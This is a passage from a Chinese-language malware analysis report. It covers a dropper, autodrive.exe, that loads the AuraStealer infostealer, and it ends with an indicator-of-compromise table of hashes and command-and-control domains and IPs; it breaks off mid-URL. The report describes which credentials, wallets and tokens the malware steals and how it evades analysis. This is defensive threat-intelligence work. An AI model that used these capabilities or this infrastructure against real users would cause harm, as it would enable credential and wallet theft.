solid rgb(208, 215, 227);min-width:210px;"><thead><tr><th data-colwidth="185" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">窃密能力</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">描述</span></p></th></tr></thead><tbody><tr><td data-colwidth="185" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">浏览器数据窃取</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">密码、Cookie、自动填充、浏览历史（Chrome/Firefox/Edge 等）</span></p></td></tr><tr><td data-colwidth="185" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">加密货币钱包</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">桌面端钱包私钥/助记词窃取 + 剪贴板劫持</span></p></td></tr><tr><td data-colwidth="185" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">系统信息收集</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">OS/硬件信息、IP 地理位置、屏幕截图、进程列表</span></p></td></tr><tr><td data-colwidth="185" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">应用程序凭据</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Discord Token、Telegram 会话、Steam、FTP/邮件/VPN 客户端凭据</span></p></td></tr><tr><td data-colwidth="185" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">文件抓取</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">按扩展名/路径规则搜索窃取 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.txt</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.doc</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.pdf</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.key</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.wallet</span></code><span leaf=""> 等</span></p></td></tr><tr><td data-colwidth="185" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">键盘记录</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">实时记录键盘输入</span></p></td></tr></tbody></table></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="189" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">4.4 样本三：autodrive.exe — 内存解密 → AuraStealer</span></h3><p data-line="191" style="margin: 1.5em 8px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">文件信息</span></strong></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);min-width:205px;"><thead><tr><th data-colwidth="180" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">属性</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">值</span></p></th></tr></thead><tbody><tr><td data-colwidth="180" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">路径</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\Public\Music\ServiceAgent\UpdateService\autodrive.exe</span></code></td></tr><tr><td data-colwidth="180" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">936B37CC8337B0B48C59C60381BC13AE</span></code></td></tr><tr><td data-colwidth="180" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">类型</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">下载器</span></p></td></tr><tr><td data-colwidth="180" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">最终载荷</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AuraStealer</span></strong></td></tr><tr><td data-colwidth="180" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">C2 地址</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">dev-tools[.]cfd</span></code></td></tr></tbody></table></p><h4 data-line="201" style="margin: 8px 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">加载过程</span></h4><p data-line="203" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">该样本同样为 Dropper，通过在内存中解密释放出另一款商业窃密木马 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AuraStealer</span></strong><span leaf="">。</span></p><h4 data-line="205" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">最终载荷：AuraStealer</span></h4><p data-line="207" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">AuraStealer 于 2025年7月首次出现，由讲俄语的威胁组织 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AuraCorp</span></strong><span leaf=""> 开发，以 MaaS 模式运营。官方宣称可从 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">110+ 种浏览器</span></strong><span leaf="">、</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">70+ 种应用程序</span></strong><span leaf="">（含钱包和 2FA）、</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">250+ 种浏览器扩展</span></strong><span leaf="">中收集数据，技术特征如下：</span></p><p data-line="209" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">AuraCorp 在地下论坛发布的 AuraStealer 销售帖（售价 295-585 美元）：<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.550185873605948" data-type="png" data-w="1076" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027953" src="https://wechat2rss.xlab.app/img-proxy/?k=3a847836&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwXENicniboGrd31L8pXCX9fFhaCxtdWiaIfuCxySmERQNC2icYicjL4icVjtzPhGNic1jktpiap8lMS1db6NYHvhjVT9x7qicv0iatMycRpo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);min-width:201px;"><thead><tr><th data-colwidth="176" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">特征</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">描述</span></p></th></tr></thead><tbody><tr><td data-colwidth="176" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">编写语言</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">C++</span></p></td></tr><tr><td data-colwidth="176" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">目标平台</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Windows 7 ~ Windows 11</span></p></td></tr><tr><td data-colwidth="176" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">浏览器窃取</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Chromium / Gecko 内核浏览器密码、Cookie、自动填充（含 ABE 绕过）</span></p></td></tr><tr><td data-colwidth="176" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">加密钱包</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">桌面端钱包应用、浏览器扩展钱包、助记词/私钥</span></p></td></tr><tr><td data-colwidth="176" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">会话令牌</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Discord Token、Telegram 会话、Steam 令牌、2FA 令牌</span></p></td></tr><tr><td data-colwidth="176" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">密码管理器</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">KeePass、Bitwarden、1Password、LastPass 数据</span></p></td></tr><tr><td data-colwidth="176" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">远程工具</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">AnyDesk、FileZilla、OpenVPN/NordVPN/ProtonVPN 凭据</span></p></td></tr><tr><td data-colwidth="176" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">反分析</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">间接控制流混淆、异常驱动 API 哈希、字符串 XOR 加密、反 VM/沙箱/调试</span></p></td></tr></tbody></table></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="226" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">五、IOC</span></h2><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);min-width:185px;"><thead><tr><th data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">类型</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">值</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">说明</span></p></th></tr></thead><tbody><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">936B37CC8337B0B48C59C60381BC13AE</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">autodrive.exe — AuraStealer Dropper</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">B7A76B82C2A5E16A3C346CC6AA145556</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">多路径冗余投放载荷（WinHealhCare / AdobeCloudSync / ChromeSyncHost / OneDriveSync / IntelGraphicsHost）</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">397405106D895815A9BEF8D84445AF5A</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">OneSync.exe — Dropper / Spreader</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">9A6EA91491CCB1068B0592402029527F</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">localvideo.exe</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">F01E96A80F92C414DD824AEF5A1AC1E7</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">manager.exe / onedrive_sync.exe</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">F9A25264ECF9013D2639875CE7F314CB</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">svc_service.exe / svc_host.exe — PureLogs Loader</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">d8256fbc62e85dae85eb8d4b49613774</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">初始压缩包</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">8660646bbc6bb7dc8f59a764e25fe1fd</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">初始压缩包</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">77c73bd5e7625b7f691bc00a1b561a0f</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">释放的 Dropper EXE</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">81fb210ba148fd39e999ee9cdc085dfc</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">释放的 Dropper EXE</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">IP</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">45.55.35.48:56001</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">PureLogs Stealer</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">DOMAIN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">serverconect[.]cc</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">PureLogs Stealer</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">DOMAIN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">dev-tools[.]cfd</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">AuraStealer</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">steamcommunity[.]com/profiles/76561198721263282</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Vidar C2</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">telegram[.]me/g1n3sss</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Vidar C2</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">IP</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">147.45.197[.]92:443</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">GhostSocks C2</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">IP</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">94.228.161[.]88:443</span></code></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">GhostSocks C2</span></p></td></tr><tr><td data-colwidth="135" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">远程载荷 URL</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a 